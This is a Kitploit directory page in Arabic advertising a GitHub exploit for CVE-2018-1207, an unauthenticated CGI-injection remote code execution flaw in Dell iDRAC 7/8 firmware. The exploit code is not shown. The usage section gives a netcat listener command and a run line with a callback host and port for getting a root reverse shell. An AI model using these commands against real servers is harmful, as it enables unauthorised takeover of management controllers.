Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2018-1207 — استغلال iDRAC 7 و 8 البرنامج الثابت < 2.52.52.52 | Kitploit
أدوات/GitHubGitHub/mgargiullo/cve-2018-1207
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubmgargiullo/cve-2018-1207

cve-2018-1207

استغلال iDRAC 7 و 8 البرنامج الثابت < 2.52.52.52

عرض المستودع
189منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-2018-1207

استغلال ثغرة في أجهزة iDRAC 7 و8 بإصدارات البرامج الثابتة الأقدم من 2.52.52.52

الوصف

أجهزة Dell EMC iDRAC7/iDRAC8، في الإصدارات السابقة للإصدار 2.52.52.52، تحتوي على ثغرة حقن CGI يمكن استخدامها لتنفيذ كود عن بُعد. قد يتمكن مهاجم عن بُعد غير مصادَق من استخدام متغيرات CGI لتنفيذ كود عن بُعد.

من المفترض أن يؤدي هذا الكود إلى فتح قشرة عكسية (reverse shell) بصلاحيات المستخدم الجذر على خدمة iDRAC.

الاستخدام

شغّل المستمع المحلي لديك: nc -v -l -p local_port

nc -v -l -p 5500

شغّل الأداة: python ./cve-2018-1207.py remote_host remote_port local_host local_port

python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500

المتطلبات

تحتاج إلى تثبيت إصدار من sh4-linux-gnu-gcc، وهو حاليًا sh4-linux-gnu-gcc-11

يمكنك تثبيته باستخدام apt install gcc-11-sh4-linux-gnu

تنزيل الأداة